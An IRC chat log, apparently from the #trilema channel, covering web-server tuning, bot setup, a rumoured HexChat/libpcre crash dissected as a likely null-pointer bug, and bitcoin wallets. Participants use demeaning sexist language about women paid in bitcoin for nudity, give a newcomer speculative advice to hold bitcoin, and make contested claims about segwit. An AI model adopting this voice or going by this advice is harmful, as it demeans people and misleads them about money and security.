replacement should do it. 1795614;1523354821;mircea_popescu;trinque try again at your leisure ? 1795615;1523355051;mircea_popescu;spyked answered ; by looking at feed i see you got a <5 minute reply (05:52 to 09:03). so go me! 1795616;1523355424;david_francois;mircea_popescu: ty! just playing a bit with my IRC setup 1795617;1523368644;phf;!!ratings david_francois 1795618;1523368646;deedbot;http://p.bvulpes.com/pastes/qto2m/?raw=true 1795619;1523368654;phf;!!reputation david_francois 1795620;1523368656;deedbot;http://p.bvulpes.com/pastes/44R0a/?raw=true 1795621;1523368748;phf;oh, nm, i missed the up in the logs, and thought it was missing from the logs altogether 1795622;1523373779;BingoBoingo;ty fxd 1795623;1523373825;BingoBoingo; holy shit look at that. wtf, twitter's going to the dogs, they've not banned BingoBoingo ?! << It's one of those bot accounts. I don't do anything with the account. It is all bot. 1795624;1523373900;mod6;They did suspend you for a brief time didn't they? 1795625;1523373990;mod6;https://archive.is/Fzk6L 1795626;1523374388;BingoBoingo;mod6: Sure, then I intervened to click through a couple forms and the bot was back 1795627;1523374500;BingoBoingo;!!up david_francois 1795628;1523374501;deedbot;david_francois voiced for 30 minutes. 1795629;1523374556;BingoBoingo;david_francois: I noticed on of your trb nodes is perenially 100,000 blocks behind. Consider building a new bitcoind with either the asciilifeform or ben_vulpes aggression patches. Vastly improved sync behavior. 1795630;1523374813;ben_vulpes;mircea_popescu: aok; i'm baffled as to why throwing a file to the running php process for evaluation would be so slow under apache but not nginx; but mod_php looks to be The Right Thing 1795631;1523375053;david_francois;david_francois: yeah, i got a new server with a SSD raid, I'm planning on getting a update TRB node there, which should be more reliable 1795632;1523375059;david_francois;BingoBoingo: ^ 1795633;1523375073;BingoBoingo;david_francois: Sweet 1795634;1523375225;mod6;david_francois: hey, good deal, thx! 1795635;1523375249;mod6;BingoBoingo: no worries. i agree though. f twitter. 1795636;1523379604;deedbot;http://qntra.net/2018/04/us-destroyer-and-russian-warplanes-engage-in-intimate-activities-in-syrian-waters/ << Qntra - US Destroyer And Russian Warplanes Engage In Intimate Activities In Syrian Waters 1795637;1523380052;deedbot;http://qntra.net/2018/04/labor-unrest-in-germany-throws-german-schedules-into-shambles/ << Qntra - Labor Unrest In Germany Throws German Schedules Into Shambles 1795638;1523380133;ben_vulpes;BingoBoingo: "agitate" 1795639;1523380150;BingoBoingo;ty fxd 1795640;1523380151;ben_vulpes;pffff six percent pay raise 1795641;1523380170;ben_vulpes;quit fucking around and implement ubi already 1795642;1523380171;BingoBoingo;More like watermelon and fried chikkken piknic 1795643;1523380183;ben_vulpes;no wait hang on i don't have enough btc for that yet 1795644;1523380718;BingoBoingo;Give it time eventually any BTC will be enough btc when the rest of the world shits the bed 1795645;1523383406;mod6;^ 1795646;1523383687;deedbot;http://www.thedrinkingrecord.com/2018/04/10/the-uraguayo-idea-of-cultural-sensitivity/ << Bingo Blog - The Uraguayo Idea Of Cultural Sensitivity 1795647;1523385661;trinque;!~later tell mircea_popescu now getting a timeout 1795648;1523385681;trinque;well fuck, that bot's gone? 1795649;1523385840;ben_vulpes;again, even 1795650;1523385852;BingoBoingo;!Q works with lobbesbot 1795651;1523385859;trinque;!Qlater tell mircea_popescu now getting a timeout 1795652;1523385860;lobbesbot;trinque: The operation succeeded. 1795653;1523385864;trinque;ty BingoBoingo 1795654;1523385915;ben_vulpes;lobbes wouldja put a vwap quoter in your bot please 1795655;1523386830;lobbes;I attempted to slap a gribble instance up on pizarro shell last night, but hit a roadblock trying to get 'tcl' working locally (sqlite3 makefile, which gribble depends on, will not run without tcl apparently) 1795656;1523387400;ben_vulpes;ah lobbes getting into the ol open source slap and tcl 1795657;1523387414;ben_vulpes;https://www.oglaf.com/wildyeast/ << fuckin died 1795658;1523390788;jurov;!!up maximian 1795659;1523390789;deedbot;maximian voiced for 30 minutes. 1795660;1523391066;douchebag;ooh 1795661;1523391071;douchebag;hexchat 0day 1795662;1523391088;douchebag;Do not use hexchat or anything with libpcre on 4.13.3 1795663;1523391357;jurov;douchebag: sauce? 1795664;1523391431;douchebag;ill have a PoC in a bit 1795665;1523391442;ben_vulpes;> douchebag sauce 1795666;1523391465;jurov;he found it himself? 1795667;1523391471;douchebag;https://raw.githubusercontent.com/undergroundagency/ezines/master/L4t3r4L_adderaLL.txt 1795668;1523391475;douchebag;first one in 0x04 1795669;1523391480;douchebag;My friend is pissed though 1795670;1523391485;douchebag;these guys stole his hexchat 0day 1795671;1523391498;douchebag;before he even made P0C 1795672;1523391505;douchebag;PoC 1795673;1523391511;douchebag;don't know why I made that 1337speak 1795674;1523391527;ben_vulpes;jurov: i found that combination of words entertaining is all 1795675;1523391627;jurov;to finish off that ascii art took him too much time, i guess 1795676;1523391937;jurov;there's no meat there 1795677;1523391960;jurov;no meat no sauce 1795678;1523392000;ben_vulpes;my eyes bled 1795679;1523392061;jurov;ben_vulpes: it prolly needs some 1337hipster font 1795680;1523392816;mircea_popescu;http://btcbase.org/log/2018-04-10#1795630 << the particular module you chose tears down and rebuilts the whole php interpreter on each call. it's ~exactly~ like rebooting your "virtual machine" after every bash line and wondering why is bash so slow. 1795681;1523392816;a111;Logged on 2018-04-10 15:40 ben_vulpes: mircea_popescu: aok; i'm baffled as to why throwing a file to the running php process for evaluation would be so slow under apache but not nginx; but mod_php looks to be The Right Thing 1795682;1523392816;lobbesbot;mircea_popescu: Sent 1 hour and 55 minutes ago: now getting a timeout 1795683;1523392834;mircea_popescu;trinque weirdballs. ima see wtf. 1795684;1523392858;ben_vulpes;mircea_popescu: nuts 1795685;1523392868;trinque;and now back to prior error actually. 1795686;1523392873;*;trinque shrugs 1795687;1523392881;mircea_popescu;ben_vulpes it's actually better in some very limited circumstances not similar to your needs. 1795688;1523392883;ckang;what error? 1795689;1523392894;ckang;have some experience with php-fpm/nginx 1795690;1523392911;mircea_popescu;ckang unrelated convo. there's a lot of subtext and whatnot going on in #trilema. 1795691;1523392912;ben_vulpes;ckang: different thread 1795692;1523392928;ckang;ah 1795693;1523392965;ben_vulpes;ckang: nginx is out for reasons of beloved clients want to use .htaccess files 1795694;1523392979;ckang;oh boo 1795695;1523393055;ckang;magento? 1795696;1523393079;mircea_popescu;nginx is not actually better for your usecase ; but worse. its notable strength sits with static content, where it actually outperforms apache. otherwise, it's generally not worth the time, even if some of the nuttier bored greybeards will set it up as a reverse proxy in lieu of a proper cache / buying more fucking machine to serve the static parts only. 1795697;1523393080;ben_vulpes;nah mircea_popescu's wordpress 1795698;1523393087;mircea_popescu;"how to spend a grand to save two dimes" 1795699;1523393126;ckang;with magento atleast, there are substantial improvements over apache/mod_php, fairly substantial too 1795700;1523393128;ben_vulpes;mircea_popescu: i am looking forward to sharing the mod_php numbers and comparing them against the nginx php-fpm numbers 1795701;1523393154;mircea_popescu;should make a nice blog article huh. 1795702;1523393160;ckang;theres a whitepaper 1795703;1523393170;ckang;on this exact subject too if you wanted to see 1795704;1523393183;ben_vulpes;ckang: don't ask to link just link lol 1795705;1523393184;mircea_popescu;ckang link, rather than offer, that way people might click. 1795706;1523393188;mircea_popescu;lol. 1795707;1523393191;ckang;sure 1795708;1523393226;mircea_popescu;http://btcbase.org/log/2018-04-10#1795641 << pait out of what, monetized chinese tarrifs on united states Only Remaining (ie, agricultural) products ? 1795709;1523393226;a111;Logged on 2018-04-10 17:09 ben_vulpes: quit fucking around and implement ubi already 1795710;1523393250;ben_vulpes;unless it's some webservercoin whitepaper in which case please no 1795711;1523393251;mircea_popescu;that's the elephant in the room : the only remaining valid export of the us is === what argentina exports. nobody cares for the farts, but they'll buy the soy. 1795712;1523393264;ben_vulpes;mircea_popescu: a) germany b) teh deficit! 1795713;1523393286;ben_vulpes;ubi's the best horse in the state-bankrupting race atm; right up there with a brand new war 1795714;1523393293;mircea_popescu;if the us could live by spending german coin it'd be like i could live by digesting my own poop. 1795715;1523393312;ben_vulpes;mircea_popescu: i was saying that germany should give up and do ubi. 1795716;1523393320;mircea_popescu;where the fuck do the ecb "money" come from if not the fucking fed ? 1795717;1523393323;ben_vulpes;as they were the subj of the linked paper. 1795718;1523393329;mircea_popescu;oh oh. afaik they do. 1795719;1523393336;mircea_popescu;you must not be white male though. 1795720;1523393347;ben_vulpes;clearly not enough of it if everyone wants another 6% this year 1795721;1523393353;ben_vulpes;shit i want another six percent too, who can i fire 1795722;1523393375;mircea_popescu;everyone has to want another 6% lol. it's like wanting a new couch and curtains in the older "economic" model integrating the whitegoods. 1795723;1523393389;ckang;https://blog.aheadworks.com/wp-content/uploads/2012/01/Optimizing_Magento_Performance_by_aheadWorks_eng.pdf 1795724;1523393389;mircea_popescu;"smart dishwasher wants 6% whereas bio-dishwasher wants new couch" 1795725;1523393397;ckang;page 4 1795726;1523393407;mircea_popescu;ckang holy shit they put a pdf on a wordpress blog ? 1795727;1523393411;ckang;but i dont think this is the one im thinking of 1795728;1523393442;mircea_popescu;http://btcbase.org/log/2018-04-10#1795655 << why aren;t you running the trinquebot ? 1795729;1523393442;a111;Logged on 2018-04-10 19:00 lobbes: I attempted to slap a gribble instance up on pizarro shell last night, but hit a roadblock trying to get 'tcl' working locally (sqlite3 makefile, which gribble depends on, will not run without tcl apparently) 1795730;1523393445;asciilifeform;in other noose, highest grade of anti-usg glittery polish, softbanned (absent from stores) 1795731;1523393467;asciilifeform;( what grade ? the kind with 'baccilae', i.e. visible multicoloured rods ) 1795732;1523393474;mircea_popescu;no way ?! 1795733;1523393484;asciilifeform;well i can only speak for this loc 1795734;1523393504;asciilifeform;spot survey of shops. 1795735;1523393506;mircea_popescu;BingoBoingo i want you to be prepared with laptop and camera to document the landing of this nut. it'll prolly be like the 1st coming of technojesus. 1795736;1523393528;asciilifeform;this is not a calamity, or anyffing, can still create it here, just needs a bit of mixin' 1795737;1523393550;mircea_popescu;asciilifeform maybe the sluts lost interest. this is nail polish yes ? 1795738;1523393556;asciilifeform;correct 1795739;1523393591;asciilifeform;( for n00b readers -- folk recipe is traditional, dating to the dawn of cheap digital photo afaik, and certainly not asciilifeform's invention ) 1795740;1523393597;BingoBoingo; BingoBoingo i want you to be prepared with laptop and camera to document the landing of this nut. it'll prolly be like the 1st coming of technojesus. << Puede ser 1795741;1523393598;mircea_popescu;"use cotton solvent and centrifugal separator to remove the rods from 100 dollar bills, then mix into plain nailpaint after having taken down the bill serials" 1795742;1523393615;asciilifeform;lol that'd rock, betcha someone would buy 1795743;1523393623;asciilifeform;iirc there are voodoo shops with 'dollar oil'. 1795744;1523393679;mircea_popescu;omfg oglaf went behind the night curtain ;/ 1795745;1523393694;asciilifeform;sslism ? aha 1795746;1523393699;BingoBoingo;asciilifeform: On that note do you want me to meet you at the airport or how is this working? 1795747;1523393716;asciilifeform;BingoBoingo: i have a car reserved, will ping you from hotel after properly slept 1795748;1523393727;ben_vulpes;mircea_popescu: baww i never even noticed 1795749;1523393741;asciilifeform;BingoBoingo: will reactivate travel key some time tomorrow 1795750;1523393750;BingoBoingo;Aite, so roughly what time should I be expecting contact? 1795751;1523393761;asciilifeform;saturday 1795752;1523393789;BingoBoingo;Watch out for the mopeds 1795753;1523393867;mircea_popescu;ckang i don't get why they construct their communications in this nonsensical manner. i'm 20% in still haven't fished an inkling of sense. 1795754;1523393920;ckang;mircea_popescu: yea this isnt the one im thinking of, it was some years back as well 1795755;1523393949;mircea_popescu;is that #superbowl on freenode ? 1795756;1523393982;ckang;so it could be dated info, but a few years back we moved a lot of customers from apache to nginx and saw a fairly substantial drop in TTFB 1795757;1523393990;ckang;its on supernets 1795758;1523393995;mircea_popescu;meh. 1795759;1523394006;ckang;also, dont ever join #5000 1795760;1523394012;mircea_popescu;why is that ? 1795761;1523394040;BingoBoingo; so it could be dated info, but a few years back we moved a lot of customers from apache to nginx and saw a fairly substantial drop in TTFB << Eh, darkhttpd ftw 1795762;1523394054;ckang;heh, well, if you want to witness it, try on a spare ircclient its fun ;) 1795763;1523394082;ckang;remember antifuck.pl ? 1795764;1523394120;mircea_popescu;actually, no. 1795765;1523394129;ckang;basically it joins you to 5000 channels 1795766;1523394133;ckang;once you join 1795767;1523394139;BingoBoingo; BingoBoingo: i have a car reserved, will ping you from hotel after properly slept << Also probably ought to warn you. The pedestrians are VERY accustomed to cars stopping for them. 1795768;1523394144;mircea_popescu;ckang what client permits this ? 1795769;1523394150;ckang;all 1795770;1523394154;mircea_popescu;o.O 1795771;1523394158;ckang;unless you are running antifuck 1795772;1523394161;asciilifeform;BingoBoingo: not driving it personally, lol 1795773;1523394171;BingoBoingo;asciilifeform: AH 1795774;1523394180;mircea_popescu;pedestrians are accustomed to cars stopping for them everywhere, wtf. 1795775;1523394218;BingoBoingo;I thought maybe after the pizzaro stuff you'd be taking off to Cabo Polonia to view the lobos marinos and nature 1795776;1523394225;mircea_popescu;here, pedestrians are also very accustomed to WALKING ALONG THE HIGHWAY, and do not see why they should wear anything besides dark colors at night. 1795777;1523394332;asciilifeform;BingoBoingo: dunno how much sight-seeing i will get in; long list of things to do in the cage 1795778;1523394332;BingoBoingo; pedestrians are accustomed to cars stopping for them everywhere, wtf. << In the sense of myself waiting on the corner to cross a street and... drivers fuck up traffic trying to wave me across when their stopping does nothing for cars heading the other direction 1795779;1523394356;BingoBoingo;How many days do you have down here? 1795780;1523394365;mircea_popescu;yeah, that's even more annoying than the "door holding" behaviours of autistic kids. 1795781;1523394379;ckang;lol 1795782;1523394384;asciilifeform;BingoBoingo: blasting off the next thurs. early am. 1795783;1523394426;BingoBoingo;asciilifeform: It's a guarantee you will get to see some of the city 1795784;1523394479;mircea_popescu;BingoBoingo depends if he decides he needs... i dunno, a pair of pliers, and it turns out montevideo dun have any. 1795785;1523394504;asciilifeform;pliers definitely needed, bringing own 1795786;1523394527;phf;"second container is lathe" 1795787;1523394532;asciilifeform;lol 1795788;1523394539;mircea_popescu;i wasn't presuming to actually name whatever magical instrument will be missing ; but merely medicine tactics. 1795789;1523394571;BingoBoingo;Well, only one way to find out if the city doesn't have and that way is sightseeing 1795790;1523394797;douchebag;!!up cassidy3 1795791;1523394798;deedbot;cassidy3 voiced for 30 minutes. 1795792;1523394806;cassidy3;heya 1795793;1523394816;mircea_popescu;how goes cassidy3 1795794;1523394829;cassidy3;My bitcoin did not come through yet :C 1795795;1523394922;mircea_popescu;mmm 1795796;1523394952;cassidy3;im doing pretty goood...i didnt get it tho 1795797;1523394954;mircea_popescu;trinque i got a mircea_popescu paid cassidy3 0.02 ; you on it ? 1795798;1523394973;mircea_popescu;cassidy3 technically, it's still just 23 hours, so bear with teh system. 1795799;1523394986;cassidy3;oki! 1795800;1523395056;asciilifeform;and earlier some d00d was complaining re mpex withdrawal -- but for some reason in kako's chan, not here 1795801;1523395081;trinque;I got it; douchebag's endless well of women sprung while I was doing surgery to the airgap box. 1795802;1523395184;cassidy3;oki great!!! around when should I see it go through...? 1795803;1523395251;asciilifeform;http://btcbase.org/log/2018-04-10#1795667 << eggog 4 is a null ptr deref. i.e. just about never usefully exploitable. 1795804;1523395251;a111;Logged on 2018-04-10 20:17 douchebag: https://raw.githubusercontent.com/undergroundagency/ezines/master/L4t3r4L_adderaLL.txt 1795805;1523395258;asciilifeform;ergo snore. 1795806;1523395292;asciilifeform;( the operative text, so that nobody else is stuck sifting through that pile o' rubbish : ' hexchat[30394]: segfault at 7f0ca6862199 ip 00007f0ca67a5993 sp 00007ffd83fab310 error 4 in libpcre.so.3.13.3[7f0ca678b000+70000] ' ) 1795807;1523395552;asciilifeform;in related lollies, http://btcbase.org/log/2014-02-17#511356 , http://btcbase.org/log/2014-10-24#894318 , http://btcbase.org/log/2015-01-23#988950 1795808;1523395552;a111;Logged on 2014-02-17 16:47 asciilifeform: [5760131.063368] bitcoin-msghand[23369]: segfault at 0 ip 000000000048bd21 sp 00007f55d1759800 error 4 in bitcoind[400000+303000] 1795809;1523395552;a111;Logged on 2014-10-24 23:15 asciilifeform: kernel: patch[28805]: segfault at 0 ip 0000000000403f35 sp 00007fffbc2fc8e0 error 4 in patch[400000+26000] 1795810;1523395552;a111;Logged on 2015-01-23 04:24 asciilifeform: i have a 0.8 node that does crash quarterly or so. bitcoin-msghand[15569]: segfault at 0 ip 0000000000blahblah sp 0000blahblahblah error 4 in bitcoind[400000+303000] 1795811;1523395576;trinque;y'know, if every chick that comes through withdraws her coin immediately, she's being paid ~USD~ for tits. 1795812;1523395585;trinque;not that it makes much difference to me. 1795813;1523395592;trinque;cassidy3: couple of hours or so, probably sooner 1795814;1523395602;ben_vulpes;trinque: assuming she goes and sells it 1795815;1523395613;trinque;yes, I am assuming that 1795816;1523395627;cassidy3;what do u suggest doing with it? 1795817;1523395644;mircea_popescu;asciilifeform point him this way. 1795818;1523395646;ben_vulpes;i prefer the conspiracy theory that douchebag has the fiverr hustle down: 20 bucks to show up and show your tits! 1795819;1523395656;ben_vulpes;and then he pockets the btc 1795820;1523395693;trinque;entirely possible; I'm just telling cassidy3 here to hold onto her coin a while, and buy a house in 2020, or w/e she likes. 1795821;1523395700;asciilifeform;mircea_popescu: did; so far no answer. 1795822;1523395708;mircea_popescu;aite. 1795823;1523395770;asciilifeform;trinque: didjaknow, at one time they gave out btc to a buncha starving sad folx, and ~0 of'em kept it. this was, of course, '90s ru 1795824;1523395774;mircea_popescu;asciilifeform it's my understanding that segfaults reported by the runtime in libraries are not customarily items that actually occuredf there, but merely were caught there incorrect ? 1795825;1523395781;asciilifeform;and not btc but privatization-shares 1795826;1523395789;asciilifeform;but roughly same result 1795827;1523395806;asciilifeform;mircea_popescu: all of the cited examples are 'error 4' i.e. nullptr deref 1795828;1523395838;asciilifeform;( kernel traps attempt to read from addr 0 , marks separately from any generic out-of-process attempt of r/w ) 1795829;1523395850;mircea_popescu;yes, but if i deref twice a pointer provided by alflib, will runtime say "idiot, you deref'd" or will it say "error 4 in alflib" ? 1795830;1523395903;mircea_popescu;because some guy in there was complaining of what it also looked to me like : "you demonstrated program can corrupt its own heap" 1795831;1523395910;trinque;cassidy3: what wallet are you using? all of the withdrawals I have here are for 3 addresses, which leads me to believe you're using some "multisig" webshit as a wallet. 1795832;1523395934;asciilifeform;mircea_popescu: i'ma demonstrate; 1s 1795833;1523395946;trinque;douchebag: if you just whip them through here without teaching them a damned thing, what's the point. I can go in the other room and see tits. 1795834;1523395947;mircea_popescu;cassidy3 bitcoin addresses start with 1. 1795835;1523395959;ben_vulpes;trinque: trezors also do that dumb shit. 1795836;1523395970;ben_vulpes;gotta kick it into "legacy" moad. 1795837;1523395998;trinque;ben_vulpes: who has the other key? "them"? 1795838;1523396027;mircea_popescu;http://btcbase.org/log/2018-04-10#1795811 << by this logic usg employees are paid in rentals ? 1795839;1523396027;a111;Logged on 2018-04-10 21:26 trinque: y'know, if every chick that comes through withdraws her coin immediately, she's being paid ~USD~ for tits. 1795840;1523396073;mircea_popescu;http://btcbase.org/log/2018-04-10#1795816 << consider the case of this guy : http://trilema.com/2013/they-really-are-buttcoins-nao/ 1795841;1523396073;a111;Logged on 2018-04-10 21:27 cassidy3: what do u suggest doing with it? 1795842;1523396085;mircea_popescu;that 10 btc would sell for about 70k or so today, ie five years later. 1795843;1523396115;mircea_popescu;there's almost nothing you can buy for bitcoin that will be worth more than the bitcoin in the medium term. 1795844;1523396135;ben_vulpes;trinque: i think the 3 is 'segwit' 1795845;1523396149;cassidy3;douchebag told me to download an electrum wallet i didnt really know what bitcoin is he sorta explained it to me. r u saying i should hold onto now and sell it when it becomes more valuable? 1795846;1523396165;mircea_popescu;i'm just telling you that you can. 1795847;1523396196;mircea_popescu;douchebag mind finding a webwallet that does proper addresses for the girls ? none of that 3 bs. 1795848;1523396272;douchebag;ive been telling them to use electrum or localbitcoins since a lot of them just ask for paypal 1795849;1523396324;mircea_popescu;i c. well, one of the two works better than the other one. 1795850;1523396339;trinque;there's a wallet service sitting right here, if they're just going to hold them on some website. 1795851;1523396348;cassidy3;how often does the price change? 1795852;1523396350;mircea_popescu;tell them to use localbitcoins then, at least they get to meet people. 1795853;1523396357;ben_vulpes;cassidy3: https://bitcoincharts.com/charts/bitstampUSD#rg5ztgSzm1g10zm2g25zv 1795854;1523396370;ben_vulpes;the dropdown under "time period" will be useful 1795855;1523396384;asciilifeform;mircea_popescu: ok, here you go: demo.asm : 1795856;1523396388;asciilifeform;global _start 1795857;1523396392;asciilifeform;_start: 1795858;1523396396;asciilifeform;mov rax, [0] 1795859;1523396402;ben_vulpes;cassidy3: if you select "all data" you can give yourself the "what color is your lamborghini" tingles 1795860;1523396404;trinque;ahemahem. deedbot is a wallet! 1795861;1523396405;asciilifeform;and then : yasm -f elf64 -g null demo.asm && ld demo.o -o demo 1795862;1523396409;asciilifeform;mircea_popescu: and then ./demo 1795863;1523396419;ben_vulpes;trinque: but the numbers don't show up on their computer har har har 1795864;1523396421;asciilifeform;and then dmesg 1795865;1523396434;mircea_popescu;asciilifeform but this loads no complex libraries stack. 1795866;1523396449;trinque;ben_vulpes: sure they do, !!balance 1795867;1523396453;asciilifeform;mircea_popescu: absolutely not needed , can happen anywhere in process space 1795868;1523396453;mircea_popescu;ben_vulpes of course they do ? !!balance , !!ledger etc 1795869;1523396459;asciilifeform;whether in library or not 1795870;1523396463;ben_vulpes;but not in the guiboxen! 1795871;1523396470;ben_vulpes;or in teh webbrowser! 1795872;1523396475;ben_vulpes;y'all are humorless gits 1795873;1523396479;mircea_popescu;asciilifeform the question was, http://btcbase.org/log/2018-04-10#1795829 1795874;1523396479;a111;Logged on 2018-04-10 21:30 mircea_popescu: yes, but if i deref twice a pointer provided by alflib, will runtime say "idiot, you deref'd" or will it say "error 4 in alflib" ? 1795875;1523396485;phf;it's a counterparty problem, they don't have trinque in their wots 1795876;1523396488;cassidy3;oooh!oki ill look more at that stuff 1795877;1523396495;mircea_popescu;phf but they have $randomwebsite ?! 1795878;1523396521;ben_vulpes;anyways cassidy3 you can leave your btc with deedbot, trinque operates it and he is a knight of the realm 1795879;1523396535;phf;mircea_popescu: of course, that's usg pseudo-wot that's maintained through all the ways that we laugh about here 1795880;1523396537;mircea_popescu;cassidy3 if you're not desperate for money, keeping it may pay off ; and if you are desperate for money it might be the last thing to sell. think family jewels. 1795881;1523396542;asciilifeform;mircea_popescu: aaaaa. if dynamically linked -- will say 'in lib...', if static -- in proggy. 1795882;1523396548;mircea_popescu;which is my point! 1795883;1523396550;ben_vulpes;far more trustworthy than "localbitcoins", i mean who are they anyways, and "electrum", same q. 1795884;1523396554;asciilifeform;aa ok i get it 1795885;1523396575;ben_vulpes;cassidy3: just never never never lose the gpg key you registered 1795886;1523396607;trinque;cassidy3: in here your recourse if I steal your money is to tarnish the reputation held on deedbot that to date says I've stolen from no one. out there, what, sue? 1795887;1523396610;trinque;!!up cassidy3 1795888;1523396610;deedbot;cassidy3 voiced for 30 minutes. 1795889;1523396692;mircea_popescu;you know im pretty sure she can self-voice. 1795890;1523396701;mircea_popescu;cassidy3 say !!up to deedbot in a pm, then !!v with the string it sent. 1795891;1523396707;asciilifeform;also come to think of it, on current linux douchebag's thing is not necessarily a null , so whoknows 1795892;1523396817;douchebag;asciilifeform: The guy who created it said he's working on a proof of concept 1795893;1523396819;mircea_popescu;phf indeed right you are, huh. 1795894;1523397054;asciilifeform;douchebag: incidentally the hinted item gives 0 way to reproduce -- it dun say where the lib was loaded in memory 1795895;1523397062;asciilifeform;so to reproduce, would have to know the trigger 1795896;1523397083;asciilifeform;it's equiv of 'winamp playlist' of 0day, rather than 0day 1795897;1523397111;asciilifeform;libpcre is reliable lolcow, however , so i believe it. 1795898;1523397129;asciilifeform;( and , consider, why the everliving fuck is a re parser need to live in a irctron ?! ) 1795899;1523397583;asciilifeform;seealso thread, http://btcbase.org/log/2017-02-09#1612658 . 1795900;1523397583;a111;Logged on 2017-02-09 18:04 asciilifeform: regex belongs in the tool chest next to 'duct tape'. 1795901;1523398597;spyked;http://btcbase.org/log/2018-04-10#1795806 <-- yeah, it doesn't look like nullptr deref. segfault addr looks somewhat close to ip, so on a first glance it would look like they tried to hijack rip and tripped a non-executable page. but can't tell for sure without a pmap or something similar. 1795902;1523398597;a111;Logged on 2018-04-10 21:21 asciilifeform: ( the operative text, so that nobody else is stuck sifting through that pile o' rubbish : ' hexchat[30394]: segfault at 7f0ca6862199 ip 00007f0ca67a5993 sp 00007ffd83fab310 error 4 in libpcre.so.3.13.3[7f0ca678b000+70000] ' ) 1795903;1523398624;spyked;and ftr, linux kernel could report whether the trigger was a read, write or exec op, but for some unknown reason doesn't. 1795904;1523399323;deedbot;http://trilema.com/2018/iguanapost-i-guanapost-igu-an-apost-i-guan-a-post/ << Trilema - Iguanapost. I guanapost ? Igu an apost ? I guan a post! 1795905;1523399846;trinque;douchebag: I guess I scared cassidy3 off, lol. I ran these; tell the next batch to generate proper addresses, or better yet, to leave the coin on deedbot. 1795906;1523399876;trinque;also wasn't there a report on trb dependencies coming? 1795907;1523400043;asciilifeform;spyked: i did realize, slightly later, lol 1795908;1523401870;*;mircea_popescu refers to his handy hashguide to indentify which one cassidy was 1795909;1523404328;ckang;trinque: i dont think many of these girls have a long term mindset as far as investing goes, mostly college students or do menial low paying work 1795910;1523404352;ckang;i know when i was in school thats how it was anyways 1795911;1523404358;ckang;for me anyways 1795912;1523404400;trinque;man I dated a bartender slut once that kept cash gangster rolls under the bed 1795913;1523404410;trinque;no excuses 1795914;1523404414;ckang;dude ya, bartenders in the right town can do real well 1795915;1523404465;ckang;but those jobs are hot commodities in college towns 1795916;1523404551;ckang;fortunately i finished without debt but i wasnt living the high life either during 1795917;1523404622;ckang;theres also plenty of girls that just go to school to meet a husband, which hey, more power to you i suppose. 1795918;1523405611;phf;mircea_popescu: i've been searching from: "http://" as a way to remind myself who is who 1795919;1523406818;ckang;trinque: btw, is there a correct and incorrect way to make an address? 1795920;1523409097;douchebag;just got back from college 1795921;1523409106;douchebag;yeah ill tell them 1795922;1523409628;lobbes;speed of implementation really (I got other tmsr irons in fire). I figured I could get a tickerbot up and running quicker just using a gribble instance >> http://btcbase.org/log/2018-04-10#1795728 1795923;1523409628;a111;Logged on 2018-04-10 20:50 mircea_popescu: http://btcbase.org/log/2018-04-10#1795655 << why aren;t you running the trinquebot ? 1795924;1523409631;lobbes;buut, the lack of 'root' access and my general inexperience with non-debian linuxen is throwing me for a loop. Though, suprisingly to me, it is the former rather than the latter that is throwing me the farthest (I've kinda been enjoying building shit from source). 1795925;1523410219;douchebag;mircea_popescu: 1795926;1523410231;douchebag;Girls are wondering if they wanna show tits 1795927;1523410247;douchebag;you around? 1795928;1523410368;douchebag;trinque: I'm going to get a trb node setup when I get that server 1795929;1523410382;douchebag;because right now if I put it on any of these machines, they wouldn't be running 24/7 1795930;1523410418;douchebag;someones znc is being retarded 1795931;1523415691;*;mircea_popescu waves 1795932;1523415703;mircea_popescu;douchebag hit it. 1795933;1523415746;ckang;will you be around for a bit mircea_popescu ? 1795934;1523415754;mircea_popescu;yes. 1795935;1523416155;mircea_popescu;meanwhile somewhere else, "I looked through your profile and I like what I've seen. What would serving you entail?" 1795936;1523416161;mircea_popescu;2018, the year i'ma be overwhelmed. 1795937;1523416239;mircea_popescu;http://btcbase.org/log/2018-04-10#1795909 << i know, i know. kinda expected. still... gotta say something to them, whether they follow or not the wise words of the elders is what distinguishes the talented from the mediocre in any generation, isn't it. 1795938;1523416239;a111;Logged on 2018-04-10 23:52 ckang: trinque: i dont think many of these girls have a long term mindset as far as investing goes, mostly college students or do menial low paying work 1795939;1523416319;mircea_popescu;http://btcbase.org/log/2018-04-10#1795912 <<->> http://trilema.com/2011/spargatorii-si-curva/ ; i should prolly translate that shouldn't i. 1795940;1523416319;a111;Logged on 2018-04-10 23:53 trinque: man I dated a bartender slut once that kept cash gangster rolls under the bed 1795941;1523416422;mircea_popescu;http://btcbase.org/log/2018-04-10#1795917 << actually, the college standard for middle-class kids throughout the 90s and maybe a short sliver of the 00s was kinda BingoBoingo 's experience : "they gave me all this money to leave parents' house, ima... drink it / smoke it". it came to an end, of course, nohope.jpg now, but it's what it was for a while there. i know n examples. 1795942;1523416422;a111;Logged on 2018-04-10 23:57 ckang: theres also plenty of girls that just go to school to meet a husband, which hey, more power to you i suppose. 1795943;1523416463;mircea_popescu;but otherwise, girls going to college to meet the sort of guy that goes to college is a time and space invariant. true in egypt today as it was true in romania 50 years ago as it was true in the us since inception. 1795944;1523416656;mircea_popescu;http://btcbase.org/log/2018-04-11#1795919 << bitcoin addresses come in the form 1x, like say 1NwAjL6CwMHm5S9aeFfmop5VtqBA6aNJRT ; some dorks came up with an "extension". there are fundamental problems with their code, discussed in the logs, http://btcbase.org/log/2017-08-11#1697111 / http://btcbase.org/log/2017-08-11#1697118 1795945;1523416656;a111;Logged on 2018-04-11 00:33 ckang: trinque: btw, is there a correct and incorrect way to make an address? 1795946;1523416656;a111;Logged on 2017-08-11 17:49 mircea_popescu: ben_vulpes and block depth. if you make segwit tx a to me at height 1 and i put it into a normal tx at block 2, i can spend it from block 3 as my bitcoin, the segwitnmess is gone out of it. to steal it from me, one has to rewind all the way to block 1 again. which is possible, but expensive as the chain builds. 1795947;1523416656;a111;Logged on 2017-08-11 17:52 mircea_popescu: ben_vulpes the substantial weakness segwit adds to bitcoin chain security is that witout it, one needs the power to unwind the chain AND the keys of old txn to steal bitcoin. whereas with it, one only needs the hash power, as anyone can spend the segwit shit. 1795948;1523416708;mircea_popescu;there's this pattern in usg attempts to subvert bitcoin, as discussed in that thread and generally in the logs ; it's "success" depends on the ignorance of the userbase, which is what separates very sharply the bitcoin "users" into republican and imperial sets. the latter have some dust and reddit. 1795949;1523416785;ckang;i heard something the other day which may be of concern soon 1795950;1523416806;ckang;but a CPA was sent a letter asking him to report any clients he had who dealt with crypto 1795951;1523416817;mircea_popescu;this is ancient news. 1795952;1523416828;ckang;yea he just got it last week 